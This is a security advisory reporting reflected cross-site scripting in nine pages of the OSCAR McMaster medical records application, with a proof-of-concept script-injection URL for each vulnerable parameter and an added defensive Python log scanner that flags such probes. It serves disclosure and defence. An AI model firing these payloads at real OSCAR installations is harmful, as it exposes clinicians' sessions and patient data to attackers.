A reflected Cross-Site Scripting (XSS) vulnerability exists in multiple pages of the OSCAR McMaster application, version 19.40~1235, that allows execution of arbitrary JavaScript in the context of the application.
[Placeholder for CVE mitre]
Vulnerable Pages and Parameters:
documentReport.jsp - functionid, function, curUser parameters
addappointment.jsp - duration, end_time, start_time, day, month, year, provider_no parameters
unLock.jsp - userName parameter
demographiccontrol.jsp - keyword parameter
providercontrol.jsp - provider_no, viewall, view, month, year, day, every_min parameters
CalendarPopup.jsp - month, year, param, urlfrom parameters
logReport.jsp - endDate, startDate parameters
SendDemoMessage.do - demographic_no parameter
ViewConsultation.do - demographic_no parameter
Example Proof-of-Concept Payloads:
documentReport.jsp - /oscar/dms/documentReport.jsp?function=provider&functionid=999998&curUser=999998daka4%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Eowtpz
addappointment.jsp - /oscar/appointment/addappointment.jsp?provider_no=999998&bFirstDisp=true&year=2021&month=08&day=27&start_time=08:00&end_time=08%3a14pyqzl'><script>alert(document.domain)<%2fscript>mam5x&duration=null
unLock.jsp - /oscar/admin/unLock.jsp?userName=192.168.105.149w5q31%3Cscript%3Ealert(document.domain)%3C%2fscript%3Efe9hjvibv0e&submit=Unlock
demographiccontrol.jsp - /oscar/demographic/demographiccontrol.jsp?search_mode=search_name&keyword=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&orderby=last_name%2C+first_name&dboperation=search_titlename&limit1=0&limit2=10&displaymode=Search&ptstatus=active&fromMessenger=false&outofdomain=
providercontrol.jsp - /oscar/provider/providercontrol.jsp?year=%3Cscript%3Ealert(document.domain)%3C/script%3E;&month=8&day=18&view=0&curProvider=null&curProviderName=null&displaymode=day&dboperation=searchappointmentday
CalendarPopup.jsp - /oscar/share/CalendarPopup.jsp?urlfrom=xm4vs"><script>alert(document.domain)<%2fscript>mrrlq&year=2021&month=08&param=%26view%3D0%26displaymode%3Dday%26dboperation%3Dsearchappointmentday%26viewall%3D1
logReport.jsp - /oscar/admin/logReport.jsp?providerNo=*&content=admin&startDate=2021-08-29b2266"><script>alert(document.domain)<%2fscript>xdzr6digegi&endDate=2021-08-30&submit=Run+Report
SendDemoMessage.do - /oscar/oscarMessenger/SendDemoMessage.do?demographic_no=dllj2%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ej7t05
ViewConsultation.do - /oscar/oscarEncounter/ViewConsultation.do?sendTo=i15ji%3cscript%3ealert(document.domain)%3c%2fscript%3eu5x29&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2%27%20ASC&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=
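As an added example, not part of this advisory or of the OSCAR project, a defender-side check that flags requests to the affected pages whose listed parameters carry tag markup once URL decoding is undone, run over constructed access-log lines. The paths and parameter names come from the lists above; the common log format, the sample lines and the inclusion of sendTo for ViewConsultation.do (the parameter its payload above uses) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Affected pages and the parameters the advisory lists for each (sendTo is added for
# ViewConsultation.do because the advisory's payload for that action uses it).
AFFECTED = {
    "/oscar/dms/documentReport.jsp": {"functionid", "function", "curUser"},
    "/oscar/appointment/addappointment.jsp": {"duration", "end_time", "start_time", "day", "month", "year", "provider_no"},
    "/oscar/admin/unLock.jsp": {"userName"},
    "/oscar/demographic/demographiccontrol.jsp": {"keyword"},
    "/oscar/provider/providercontrol.jsp": {"provider_no", "viewall", "view", "month", "year", "day", "every_min"},
    "/oscar/share/CalendarPopup.jsp": {"month", "year", "param", "urlfrom"},
    "/oscar/admin/logReport.jsp": {"endDate", "startDate"},
    "/oscar/oscarMessenger/SendDemoMessage.do": {"demographic_no"},
    "/oscar/oscarEncounter/ViewConsultation.do": {"demographic_no", "sendTo"},
}
# Markup these parameters never legitimately carry: a tag opener, or a quote followed by '>'.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|[\"']\s*>", re.IGNORECASE)
# Request target in a common-log-format line: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding; probes are sometimes double-encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(target):
    """Return (path, parameter, decoded value) for each watched parameter carrying markup."""
    parts = urlsplit(target)
    watched = AFFECTED.get(parts.path, ())
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in (values if name in watched else ()):
            decoded = decode_fully(value)
            if SUSPICIOUS.search(decoded):
                hits.append((parts.path, name, decoded))
    return hits

def scan_log(lines):
    """Return the hits found in the request targets of the given access-log lines."""
    targets = (m.group(1) for m in map(REQ_RE.search, lines) if m)
    return [hit for t in targets for hit in scan_request(t)]

# Constructed sample log lines (not real traffic): one benign, one with a reflected-XSS probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Aug/2021:10:01:02 +0000] "GET /oscar/admin/unLock.jsp?userName=jsmith&submit=Unlock HTTP/1.1" 200 512',
    '10.0.0.9 - - [29/Aug/2021:10:02:17 +0000] "GET /oscar/share/CalendarPopup.jsp?urlfrom=x%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E&year=2021&month=08&param=%26view%3D0 HTTP/1.1" 200 2048']
```

Only the listed parameters are inspected, so a probe against an unlisted parameter or page is not reported; widen AFFECTED once the fix is verified rather than relying on this as a complete filter.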
Discovered by Jack McBride, August 2021